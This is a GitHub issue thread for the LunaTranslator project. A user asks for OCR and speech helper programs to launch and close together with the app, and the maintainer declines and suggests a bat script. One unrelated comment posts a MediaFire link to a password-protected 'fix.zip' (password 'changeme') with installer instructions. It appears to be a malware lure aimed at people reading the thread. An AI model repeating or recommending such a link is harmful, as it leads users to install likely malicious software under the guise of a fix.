### ISSUE TITLE
协同软件同步启动与关闭

### ISSUE THREAD

**Issue by X012C** [HIllya51/LunaTranslator#1039]
### Expected behavior 预期的功能

OCR和语音朗读功能通常需要启动.exe程序或者.bat脚本这些启动服务端的执行动作，而且启动先后顺序容易触发bug，例如我遇到的语音朗读失灵，这时候不得不重新关掉再启动一遍。如果能够在确定一些执行文件的固定路径后，稳定地执行模板命令，使得在打开luna的时候快速启动并且最小化这些服务于翻译器所需功能的程序就太棒了。

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HIllya51** [comment]
你写个bat在启动的时候一起把你的服务一起拉起来不就行了。
我是不可能这样做的。以voicevox为例，有时我只是想获取一下他的voice列表，要是我来做，那就得先拉起服务+获取列表+关闭服务，一来一回花都谢了。
